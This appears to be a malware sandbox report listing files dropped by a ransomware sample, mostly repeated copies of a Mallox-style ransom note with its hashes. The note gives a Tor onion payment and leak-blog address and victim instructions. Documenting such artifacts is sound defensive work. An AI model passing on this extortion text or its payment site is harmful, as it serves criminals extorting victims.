                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32876
                        Entropy (8bit):7.994122308958193
                        Encrypted:true
                        SSDEEP:768:ttXX4IlMyga1LmsN4jSIk/yTE7k7eclOihLIgIXLiEp:ttXnlRBmsiSI0yAKlOgNQ5p
                        MD5:27DED726B32EDBFF39574324CC76C01C
                        SHA1:82605CE414756EB21B778665924DDA56D7E6611B
                        SHA-256:DA55D262A1580F9AFAAC7AAAC804C377AC16C6144A37FD798445EFBFE7B8C5C7
                        SHA-512:5CD42F048A45C775DB5153EFEC12893567ADB68C5E942216DB5F4F5EEF1CAD9B43C04B525DC541A6532F94EBE8276719BB274C84045ABC4F0CC7494996FE8903
                        Malicious:true
                        Preview:',.....^.k..e...\...x..?.!.2....Cq6J.Y|...V......f<\?.W.j.........U.MY.|'..u..>.3&44s...T{..*.A.."...t.2.i.Ln....V.qk'=....'/.......m.-.>..d..[..T..w.#..t-0...!..h:.._..y.?....z..^(..2 ...._..A...W.>...$..D'~.d.."`A........KA...)...!c.....P.T..)..p....$h.lD.k[z..+...'..3.a.4......C.......6..w,a!2.r<..e....L.K>....w.@.k.K...-Ua..$....>'B..z.....f.....0.<4x.U...~.{....l..H!I.Nc....bX..}.*A.4.3...K..Te.5g..6...).NG...Y.e'..Sk:.d..MA..rz...w.W9B...L.d.W.5..d\....K67..]..u.>.ze..b.w.k*..0t..Z.h..Y....~.\{f..R.1.Wi.A.......I.M....2..+?.F.'...-1..`=...%..%.;x|.9\...&.H.JP..j.|E....3^%:7%:..dZ.L.$v.Y..h./PA2..H..w...ge...&^.*.:.....od...Z...7(.M.c.9,......A"...6.1..\c@..L...X*,.Q..+ ..'..t..`.g.l.(.(.^.(.o..1... iw$..`....h(...e3l..u../.~R.*.UK@..l..zX.&.<..}...s[..D.|...6.=e.P...T.k..*.._...P0_...-SO...&..].N.|.^.jxn.....2....K.....Jn.g@....*v.a@..Z:........u.5...5......e...r.ik...j.+........=Z.c.[u.9.b...;..........4.O.;QG......g._.>..8.

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1351500
                        Entropy (8bit):3.660781026399493
                        Encrypted:false
                        SSDEEP:3072:V5ILYNLIuWSzxcPolR9FEeI0mGWPMfaL+eGsQ+:OYNLIzSFc9J
                        MD5:1E8D41346AD54FB2CAC07EB59AF4D021
                        SHA1:45C8D14A11900A81E3E2BE9FC4DB473E0ED8D2F1
                        SHA-256:3830529A29A2BC2A93510CF4E127BECD9ADD496712A2CFB7C85062D0201774E9
                        SHA-512:48F04051A99DF823C917E74F824041B9A9EF6632A314DC5C2721AA25CAD40C30668DF0E453600D8DC5098729D5F7BCB7CB2377F9190F931CF0D6E976D00F86B4
                        Malicious:false
                        Preview:....`.=..(...].^..<.v......@.....W..,....fI^b...%~...qUD=...!...]H......2.y..Y.p.Vu.M..[*...8..|.a..y:.e.\....:..h}...[.....K...*..ua.?..q.,.y......l...#{Y."{.p...^..=.Q.OR)[.(....t......B.eE.3..E.g+].[.w;...C.^F.](.v.TTM.*.u..8..8L.)........u.. ..P...C]..J..I.wFD./.A[.... ".H..e.M..0.....jP.....e%`.}.-O .A......1`.....F...... ^..D")ms..G..2y=.!.V.,.L3....2<>.e.....W...y....9..*..?..v.<I....`.%..vJm.eR.#...c..$...rKi...@*p..RG...U.?.B.[.....<.q..H.~.0cs..CK.@].o...Ns..../6..I.....Wz....)...V@...z.......:...P....0]_o.....7.5.<.+...j-.j.....*.xJ.?.w%U..#z..\....;.I.*.YY7.0..^...t.8.lu,..0.....I.L.6..!YN..W.i....._Z;B.o.gW..-..=.<..'...m.c.\.O........E...pN..\C....!.....)iL.g)..4*......}}.7......TR!:.#h.P.vP.UP..l%7SVZ...6..u...H.k...[O."n....O...W&.z....4i..S3`.gJ2Qj...4.}8...0...O.9.6U7t..D9M[.~.......R......d..^.....V..O.".....h..&.+.)......#...q`c.....@..qq..|@..t.....I.,{.@&.^.....5q.y:.t.............qg9[...e...[K.....W@.{.m...Z./.

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
